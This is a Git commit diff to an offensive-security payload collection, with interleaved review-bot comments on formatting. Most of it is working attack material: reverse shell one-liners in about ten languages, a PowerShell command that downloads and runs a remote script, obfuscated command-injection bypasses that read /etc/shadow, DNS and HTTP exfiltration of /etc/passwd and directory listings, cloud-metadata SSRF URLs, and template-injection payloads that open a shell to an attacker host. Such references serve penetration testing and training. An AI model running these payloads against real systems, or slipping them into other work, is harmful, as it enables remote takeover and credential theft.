Multiple updates in READMEs + RCE tricks

This commit is contained in:
Swissky 2018-08-12 00:17:58 +02:00
parent b20cdde4d9
commit 177c12cb79
16 changed files with 153 additions and 98 deletions

View File

@ -2,14 +2,14 @@
## Reverse Shell Cheat Sheet ## Reverse Shell Cheat Sheet
Bash TCP ### Bash TCP
```bash ```bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
0<&196;exec 196<>/dev/tcp/<your IP>/<same unfiltered port>; sh <&196 >&196 2>&196 0<&196;exec 196<>/dev/tcp/<your IP>/<same unfiltered port>; sh <&196 >&196 2>&196
``` ```
Bash UDP ### Bash UDP
``` ```
Victim: Victim:
sh -i >& /dev/udp/127.0.0.1/4242 0>&1 sh -i >& /dev/udp/127.0.0.1/4242 0>&1
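Review bot: the fence under `### Bash UDP` is untagged while the `### Bash TCP` block just above it is tagged ```bash; tag it ```bash too so the promoted `###` headings and their blocks read uniformly across the sheet.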
@ -19,7 +19,7 @@ nc -u -lvp 4242
``` ```
Perl ### Perl
```perl ```perl
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
@ -30,17 +30,17 @@ NOTE: Windows only
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
``` ```
Python ### Python
```python ```python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
``` ```
PHP ### PHP
```bash ```bash
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
``` ```
Ruby ### Ruby
```ruby ```ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
@ -51,23 +51,23 @@ ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.pope
``` ```
Netcat Traditional ### Netcat Traditional
```bash ```bash
nc -e /bin/sh [IPADDR] [PORT] nc -e /bin/sh [IPADDR] [PORT]
``` ```
Netcat OpenBsd ### Netcat OpenBsd
```bash ```bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
``` ```
Ncat ### Ncat
```bash ```bash
ncat 127.0.0.1 4444 -e /bin/bash ncat 127.0.0.1 4444 -e /bin/bash
ncat --udp 127.0.0.1 4444 -e /bin/bash ncat --udp 127.0.0.1 4444 -e /bin/bash
``` ```
Powershell ### Powershell
```powershell ```powershell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
``` ```
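Review bot: the first PowerShell one-liner under `### Powershell` references `$client.GetStream()` but never assigns `$client`; the result of `New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT])` is discarded, so the command fails on the first use of `$client`. The second variant, visible as the context line of the next hunk (`$client = New-Object System.Net.Sockets.TCPClient(...)`), has the assignment; align this one with it or drop the broken duplicate. Also `### Netcat OpenBsd` should read `OpenBSD`.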
@ -81,14 +81,14 @@ powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40
powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1') powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')
``` ```
Java ### Java
```java ```java
r = Runtime.getRuntime() r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor() p.waitFor()
``` ```
NodeJS ### NodeJS
```javascript ```javascript
(function(){ (function(){
var net = require("net"), var net = require("net"),
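Review bot: the block under `### Java` is Groovy, not Java: `r.exec(["/bin/bash","-c",...] as String[])` relies on Groovy's list literal and `as` cast, and the three lines have no type declarations or semicolons, so it will not compile as Java. Retitle it (it belongs with the Groovy section this commit adds further down in the same file) or mark it as Groovy in the heading, and keep `### Java` for a snippet that is actually Java.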
@ -102,8 +102,28 @@ NodeJS
}); });
return /a/; // Prevents the Node.js application form crashing return /a/; // Prevents the Node.js application form crashing
})(); })();
or
require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
or
-var x = global.process.mainModule.require
-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')
``` ```
### Groovy - by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76)
```javascript
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
```
NOTE: Java reverse shell also work for Groovy
## Spawn TTY ## Spawn TTY
``` ```
/bin/sh -i /bin/sh -i
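Review bot: the new `### Groovy` section is fenced ```javascript; tag it ```groovy (or ```java) so highlighting matches the language. In the same hunk, `NOTE: Java reverse shell also work for Groovy` should read `also works`, and the context line `// Prevents the Node.js application form crashing` has `form` for `from`. The two bare `or` lines sit inside the NodeJS fence and therefore render as code; close the fence before each one and reopen it after, or turn them into a short prose sentence between separate blocks.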

README.md
View File

@ -29,46 +29,72 @@ You might also like :
* Tomcat CVE-2017-12617.py * Tomcat CVE-2017-12617.py
## Tools ## Try Harder
* [Kali Linux](https://www.kali.org/) Ever wonder where you can use your knowledge ? The following list will help you find "targets" to improve your skills.
* [Web Developer](https://addons.mozilla.org/en-Gb/firefox/addon/web-developer/)
* [Hackbar](https://addons.mozilla.org/en-Gb/firefox/addon/hackbar/?src=search) - Not compatible with Firefox Quantum * __Bug Bounty Platforms__
* [Burp Proxy](https://portswigger.net) * [HackerOne](https://hackerone.com)
* [Fiddler](https://www.telerik.com/download/fiddler) * [BugCrowd](https://bugcrowd.com)
* [DirBuster](https://sourceforge.net/projects/dirbuster/) * [Bounty Factory](https://bountyfactory.io)
* [GoBuster](https://github.com/OJ/gobuster) * [Synack](https://www.synack.com/)
* [Knockpy](https://github.com/guelfoweb/knock) * [Intigriti](https://www.intigriti.com)
* [SQLmap](http://sqlmap.org) * [List of Bounty Program](https://bugcrowd.com/list-of-bug-bounty-programs/)
* [Nikto](https://cirt.net/nikto2) * __Online Platforms__
* [Nessus](http://www.tenable.com/products/nessus-vulnerability-scanner) * [Hack The Box](hackthebox.eu/)
* [Recon-ng](https://bitbucket.org/LaNMaSteR53/recon-ng) * [Penetration test lab "Test lab" | Pentestit](https://lab.pentestit.ru)
* [Wappalyzer](https://wappalyzer.com/download) * [PentesterLab : Learn Web Penetration Testing: The Right Way](https://pentesterlab.com/)
* [Metasploit](https://www.metasploit.com/) * [Zenk-Security](https://www.zenk-security.com/epreuves.php)
* [OpenVAS](http://www.openvas.org/) * [Root-Me](https://www.root-me.org)
* [W3Challs](https://w3challs.com/)
* [NewbieContest](https://www.newbiecontest.org/)
* [Vulnhub](https://www.vulnhub.com/)
* [The Cryptopals Crypto Challenges](https://cryptopals.com/)
* [alert(1) to win](https://alf.nu/alert1)
* [Hacksplaining](https://www.hacksplaining.com/exercises)
* [HackThisSite](https://hackthissite.org)
* [Hackers.gg](hackers.gg)
* [Mind Map - Penetration Testing Practice Labs - Aman Hardikar](http://www.amanhardikar.com/mindmaps/Practice.html)
## Book's list
Grab a book and relax, these ones are the best security books (in my opinion).
* [Web Hacking 101](https://leanpub.com/web-hacking-101)
* [Breaking into Information Security: Learning the Ropes 101 - Andrew Gill](https://leanpub.com/ltr101-breaking-into-infosec)
* [OWASP Testing Guide v4](https://www.owasp.org/index.php/OWASP_Testing_Project)
* [Penetration Testing: A Hands-On Introduction to Hacking](http://amzn.to/2dhHTSn)
* [The Hacker Playbook 2: Practical Guide to Penetration Testing](http://amzn.to/2d9wYKa)
* [The Hacker Playbook 3: Practical Guide to Penetration Testing - Red Team Edition](http://a.co/6MqC9bD)
* [The Mobile Application Hackers Handbook](http://amzn.to/2cVOIrE)
* [Black Hat Python: Python Programming for Hackers and Pentesters](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900)
* [Metasploit: The Penetration Tester's Guide](https://www.nostarch.com/metasploit)
* [The Database Hacker's Handbook, David Litchfield et al., 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html)
* [The Shellcoders Handbook by Chris Anley et al., 2007](http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html)
* [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html)
* [The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html)
* [iOS Hackers Handbook by Charlie Miller et al., 2012](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118204123.html)
* [Android Hackers Handbook by Joshua J. Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html)
* [The Browser Hackers Handbook by Wade Alcorn et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html)
* [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html)
* [Car Hacker's Handbook by Craig Smith, 2016](https://www.nostarch.com/carhacking)
## Online Challenges ## More resources
* [Hack The Box](hackthebox.eu/)
* [Root-Me](https://www.root-me.org)
* [Zenk-Security](https://www.zenk-security.com/epreuves.php)
* [W3Challs](https://w3challs.com/)
* [NewbieContest](https://www.newbiecontest.org/)
* [Vulnhub](https://www.vulnhub.com/)
* [The Cryptopals Crypto Challenges](https://cryptopals.com/)
* [Penetration Testing Practice Labs](http://www.amanhardikar.com/mindmaps/Practice.html)
* [alert(1) to win](https://alf.nu/alert1)
* [Hacksplaining](https://www.hacksplaining.com/exercises)
* [HackThisSite](https://hackthissite.org)
* [PentesterLab : Learn Web Penetration Testing: The Right Way](https://pentesterlab.com/)
* [Hackers.gg](hackers.gg)
## Bug Bounty ### Blogs/Websites
* [HackerOne](https://hackerone.com) * [BUG BOUNTY FIELD MANUAL: THE DEFINITIVE GUIDE FOR PLANNING, LAUNCHING, AND OPERATING A SUCCESSFUL BUG BOUNTY PROGRAM](https://www.hackerone.com/blog/the-bug-bounty-field-manual)
* [BugCrowd](https://bugcrowd.com) * [How to become a Bug Bounty Hunter - Sam Houston](https://forum.bugcrowd.com/t/researcher-resources-how-to-become-a-bug-bounty-hunter/1102)
* [Bounty Factory](https://bountyfactory.io) * [Tips from Top Hackers Bug Hunting methodology and the importance of writing quality submissions - Sam Houston](https://www.bugcrowd.com/tips-from-top-hackers-bug-hunting-methodology-and-the-importance-of-writing-quality-submissions/)
* [List of Bounty Program](https://bugcrowd.com/list-of-bug-bounty-programs/) * [ARNE SWINNEN'S SECURITY BLOG JUST ANOTHER INFOSEC BLOG](https://www.arneswinnen.net)
* [XSS Jigsaw - innerht.ml](https://blog.innerht.ml)
* [ZeroSec Blog: Featuring Write-Ups, Projects & Adventures](https://blog.zsec.uk/tag/ltr101/)
## Docker ### Youtube
* [Hunting for Top Bounties - Nicolas Grégoire](https://www.youtube.com/watch?v=mQjTgDuLsp4)
* [BSidesSF 101 The Tales of a Bug Bounty Hunter - Arne Swinnen](https://www.youtube.com/watch?v=dsekKYNLBbc)
* [Security Fest 2016 The Secret life of a Bug Bounty Hunter - Frans Rosén](https://www.youtube.com/watch?v=KDo68Laayh8)
* [IppSec Channel - Hack The Box Writeups](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA)
### Docker
| Command | Link | | Command | Link |
| :------------- | :------------- | | :------------- | :------------- |
| `docker pull remnux/metasploit` | [docker-metasploit](https://hub.docker.com/r/remnux/metasploit/) | | `docker pull remnux/metasploit` | [docker-metasploit](https://hub.docker.com/r/remnux/metasploit/) |
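Review bot: two entries in the new `Try Harder` list have no URL scheme, `[Hack The Box](hackthebox.eu/)` and `[Hackers.gg](hackers.gg)`, so GitHub renders them as relative links into the repository and they 404; prefix both with `https://`. Smaller points in the same hunk: `## Book's list` should be `## Book list` (or `## Books`), `List of Bounty Program` should be `Programs`, and `your knowledge ?` has a stray space before the question mark.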
@ -83,37 +109,3 @@ You might also like :
| `docker-compose build && docker-compose up` | [OWASP NodeGoat](https://github.com/owasp/nodegoat#option-3---run-nodegoat-on-docker) | | `docker-compose build && docker-compose up` | [OWASP NodeGoat](https://github.com/owasp/nodegoat#option-3---run-nodegoat-on-docker) |
| `docker pull citizenstig/nowasp` | [OWASP Mutillidae II Web Pen-Test Practice Application](https://hub.docker.com/r/citizenstig/nowasp/) | | `docker pull citizenstig/nowasp` | [OWASP Mutillidae II Web Pen-Test Practice Application](https://hub.docker.com/r/citizenstig/nowasp/) |
| `docker pull bkimminich/juice-shop` | [OWASP Juice Shop](https://github.com/bkimminich/juice-shop#docker-container) | | `docker pull bkimminich/juice-shop` | [OWASP Juice Shop](https://github.com/bkimminich/juice-shop#docker-container) |
## More resources
### Book's list:
* [Web Hacking 101](https://leanpub.com/web-hacking-101)
* [OWASP Testing Guide v4](https://www.owasp.org/index.php/OWASP_Testing_Project)
* [Penetration Testing: A Hands-On Introduction to Hacking](http://amzn.to/2dhHTSn)
* [The Hacker Playbook 2: Practical Guide to Penetration Testing](http://amzn.to/2d9wYKa)
* [The Mobile Application Hackers Handbook](http://amzn.to/2cVOIrE)
* [Black Hat Python: Python Programming for Hackers and Pentesters](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900)
* [Metasploit: The Penetration Tester's Guide](https://www.nostarch.com/metasploit)
* [The Database Hacker's Handbook, David Litchfield et al., 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html)
* [The Shellcoders Handbook by Chris Anley et al., 2007](http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html)
* [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html)
* [The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html)
* [iOS Hackers Handbook by Charlie Miller et al., 2012](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118204123.html)
* [Android Hackers Handbook by Joshua J. Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html)
* [The Browser Hackers Handbook by Wade Alcorn et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html)
* [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html)
* [Car Hacker's Handbook by Craig Smith, 2016](https://www.nostarch.com/carhacking)
### Blogs/Websites
* http://blog.zsec.uk/101-web-testing-tooling/
* https://blog.innerht.ml
* https://blog.zsec.uk
* https://www.exploit-db.com/google-hacking-database
* https://www.arneswinnen.net
* https://forum.bugcrowd.com/t/researcher-resources-how-to-become-a-bug-bounty-hunter/1102
### Youtube
* [Hunting for Top Bounties - Nicolas Grégoire](https://www.youtube.com/watch?v=mQjTgDuLsp4)
* [BSidesSF 101 The Tales of a Bug Bounty Hunter - Arne Swinnen](https://www.youtube.com/watch?v=dsekKYNLBbc)
* [Security Fest 2016 The Secret life of a Bug Bounty Hunter - Frans Rosén](https://www.youtube.com/watch?v=KDo68Laayh8)
* [IppSec Channel - Hack The Box Writeups](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA)
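Review bot: the removed `### Blogs/Websites` list contained `http://blog.zsec.uk/101-web-testing-tooling/` and `https://www.exploit-db.com/google-hacking-database`, and neither reappears in the new `### Blogs/Websites` section added earlier in this file, so the reorganisation silently drops two resources; re-add them under the new section or mention the removal in the commit message. The books and YouTube entries of the removed block are carried over one-to-one.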

View File

@ -1,5 +1,6 @@
# Remote Commands Execution # Remote Commands Execution
Remote Commands execution is a security vulnerability that allows an attacker to execute Commandss from a remote server. Remote Commands execution is a security vulnerability that allows an attacker to execute Commandss from a remote server.
NOTE: Reverse Shell Command are relocated to a [single file](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
## Exploits ## Exploits
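Review bot: the added NOTE reads `Reverse Shell Command are relocated`; make it `Reverse Shell commands have been relocated`. While in this paragraph, the context line above still has `Commandss` in `execute Commandss from a remote server`, and the sentence states the wrong direction: the attacker executes commands on the remote server, not from it.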
@ -87,6 +88,13 @@ Bypass blacklisted word with $@
who$@ami who$@ami
``` ```
Bypass blacklisted word with variable expansion
```powershell
test=/ehhh/hmtc/pahhh/hmsswd
cat ${test//hhh\/hm/}
cat ${test//hh??hm/}
```
Bypass zsh/bash/sh blacklist Bypass zsh/bash/sh blacklist
```powershell ```powershell
echo $0 echo $0
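Review bot: the new `Bypass blacklisted word with variable expansion` block is fenced ```powershell but contains bash parameter expansion (`${test//hhh\/hm/}`); tag it ```bash, and the same applies to the `Bypass zsh/bash/sh blacklist` block that follows it. A one-line explanation that `${var//pattern/}` deletes every match of the pattern and that `?` is a single-character glob wildcard would make the second form, `${test//hh??hm/}`, understandable without having to work it out from the first.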
@ -94,6 +102,12 @@ echo $0
echo whoami|$0 echo whoami|$0
``` ```
## Challenge
Challenge based on the previous tricks, what does the following command do:
```powershell
g="/e"\h"hh"/hm"t"c/\i"sh"hh/hmsu\e;tac$@<${g//hh??hm/}
```
## Time based data exfiltration ## Time based data exfiltration
Extracting data : char by char Extracting data : char by char
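Review bot: the new `## Challenge` section poses a question but gives no answer or pointer to one; since this file is a reference, add the solution below the command (a collapsed `<details>` block keeps the challenge intact for readers who want to try first). Same fence issue as the hunk above: the snippet is bash, not PowerShell, so the ```powershell tag is wrong.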
@ -118,13 +132,9 @@ Based on the tool from https://github.com/HoLyVieR/dnsbin also hosted at dnsbin.
for i in $(ls /) ; do host "http://$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done for i in $(ls /) ; do host "http://$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
``` ```
## Environment based
NodeJS Commands execution
```powershell
require('child_process').exec('wget --post-data+"x=$(cat /etc/passwd)"+HOST')
```
## Thanks to ## Thanks to
* [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/) * [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
* [Bug Bounty Survey - Windows RCE spaceless](https://twitter.com/bugbsurveys/status/860102244171227136) * [Bug Bounty Survey - Windows RCE spaceless](https://twitter.com/bugbsurveys/status/860102244171227136)
* [No PHP, no spaces, no $, no { }, bash only - @asdizzle](https://twitter.com/asdizzle_/status/895244943526170628) * [No PHP, no spaces, no $, no { }, bash only - @asdizzle](https://twitter.com/asdizzle_/status/895244943526170628)
* [#bash #obfuscation by string manipulation - Malwrologist, @DissectMalware](https://twitter.com/DissectMalware/status/1025604382644232192)
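Review bot: the removed `## Environment based` section (the NodeJS `require('child_process').exec('wget --post-data ...')` exfiltration one-liner) is not a reverse shell, so the NOTE added at the top of this file about relocating reverse shell commands does not cover it, and nothing equivalent is added to the Reverse Shell cheat sheet in this commit; confirm the deletion is intended, or keep it under a section that still exists.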

View File

@ -1,6 +1,23 @@
# Server-Side Request Forgery # Server-Side Request Forgery
Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on behalf of him. Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on behalf of him.
## Summary
* [Exploit with localhost]()
* [Bypassing filters]()
* [SSRF via URL Scheme]()
* [SSRF to XSS]()
* [SSRF URL for Cloud Instances]()
* [SSRF URL for AWS Bucket]()
* [SSRF URL for Google Cloud]()
* [SSRF URL for Digital Ocean]()
* [SSRF URL for Packetcloud]()
* [SSRF URL for Azure]()
* [SSRF URL for OpenStack/RackSpace]()
* [SSRF URL for HP Helion]()
* [SSRF URL for Oracle Cloud]()
* [SSRF URL for Alibaba]()
## Exploit with localhost ## Exploit with localhost
Basic SSRF v1 Basic SSRF v1
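Review bot: every entry in the new `## Summary` has an empty link target (`[Exploit with localhost]()`), so clicking them only reloads the page; use the GitHub heading anchors, e.g. `[Exploit with localhost](#exploit-with-localhost)` and `[SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket)`. The list also flattens the hierarchy: the per-provider entries are `###` subsections of `## SSRF URL for Cloud Instances` later in this file, so indent them one level under that item.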
@ -203,8 +220,9 @@ https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brut
``` ```
## SSRF URL for Cloud Instances
## SSRF on AWS Bucket - [Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories) ### SSRF URL for AWS Bucket
[Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories)
Interesting path to look for at http://169.254.169.254 Interesting path to look for at http://169.254.169.254
``` ```
Always here : /latest/meta-data/{hostname,public-ipv4,...} Always here : /latest/meta-data/{hostname,public-ipv4,...}
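Review bot: the renamed heading `### SSRF URL for AWS Bucket` is misleading: the paths below it (`/latest/meta-data/...` on 169.254.169.254) belong to the EC2 instance metadata service, not to an S3 bucket, and the linked document is the EC2 instance metadata guide. `### SSRF URL for AWS` (or `AWS EC2`) would be accurate and would match the sibling headings such as `### SSRF URL for Google Cloud`; the Summary entry added at the top of the file needs the same rename.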
@ -253,7 +271,7 @@ http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
``` ```
## SSRF URL for Google Cloud ### SSRF URL for Google Cloud
Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True"
``` ```
http://169.254.169.254/computeMetadata/v1/ http://169.254.169.254/computeMetadata/v1/
@ -275,7 +293,7 @@ http://metadata.google.internal/computeMetadata/v1beta1/
``` ```
## SSRF URL for Digital Ocean ### SSRF URL for Digital Ocean
https://developers.digitalocean.com/documentation/metadata/ https://developers.digitalocean.com/documentation/metadata/
```powershell ```powershell
curl http://169.254.169.254/metadata/v1/id curl http://169.254.169.254/metadata/v1/id
@ -291,12 +309,12 @@ All in one request:
curl http://169.254.169.254/metadata/v1.json | jq curl http://169.254.169.254/metadata/v1.json | jq
``` ```
## SSRF URL for Packetcloud ### SSRF URL for Packetcloud
``` ```
https://metadata.packet.net/userdata https://metadata.packet.net/userdata
``` ```
## SSRF URL for Azure ### SSRF URL for Azure
Limited, maybe more exist? https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/ Limited, maybe more exist? https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/
``` ```
http://169.254.169.254/metadata/v1/maintenance http://169.254.169.254/metadata/v1/maintenance
@ -308,19 +326,19 @@ http://169.254.169.254/metadata/instance?api-version=2017-04-02
http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text
``` ```
## SSRF URL for OpenStack/RackSpace ### SSRF URL for OpenStack/RackSpace
(header required? unknown) (header required? unknown)
``` ```
http://169.254.169.254/openstack http://169.254.169.254/openstack
``` ```
## SSRF URL for HP Helion ### SSRF URL for HP Helion
(header required? unknown) (header required? unknown)
``` ```
http://169.254.169.254/2009-04-04/meta-data/ http://169.254.169.254/2009-04-04/meta-data/
``` ```
## SSRF URL for Oracle Cloud ### SSRF URL for Oracle Cloud
``` ```
http://192.0.0.192/latest/ http://192.0.0.192/latest/
http://192.0.0.192/latest/user-data/ http://192.0.0.192/latest/user-data/
@ -328,7 +346,7 @@ http://192.0.0.192/latest/meta-data/
http://192.0.0.192/latest/attributes/ http://192.0.0.192/latest/attributes/
``` ```
## SSRF URL for Alibaba ### SSRF URL for Alibaba
``` ```
http://100.100.100.200/latest/meta-data/ http://100.100.100.200/latest/meta-data/
http://100.100.100.200/latest/meta-data/instance-id http://100.100.100.200/latest/meta-data/instance-id

View File

@ -5,10 +5,11 @@
Recommended tool: [Tplmap](https://github.com/epinna/tplmap) Recommended tool: [Tplmap](https://github.com/epinna/tplmap)
e.g: e.g:
``` ```
./tplmap.py --os-shell -u 'http://www.target.com/page?name=John' python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link"
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade
``` ```
## Ruby ## Ruby
### Basic injection ### Basic injection
```python ```python
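Review bot: the three tplmap examples use the `*` injection marker (`name=John*`, `user=InjectHere*`) but the section never says what it means; add a sentence stating that `*` marks the parameter position tplmap should test, otherwise the difference from the removed `page?name=John` form is invisible. The example block is untagged, and the Ruby `### Basic injection` block visible at the end of this hunk is fenced ```python; tag the former ```bash and the latter ```ruby.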
@ -22,7 +23,7 @@ e.g:
## Java ## Java
### Basic injection ### Basic injection
```java ```java
${7*7} ${7*7}
${{7*7}} ${{7*7}}
@ -174,6 +175,13 @@ Inject this template
{{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host {{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host
``` ```
## AngularJS
### Basic injection
```javascript
$eval('1+1')
{{1+1}}
```
## Thanks to ## Thanks to
* [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) * [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
* [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/) * [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/)
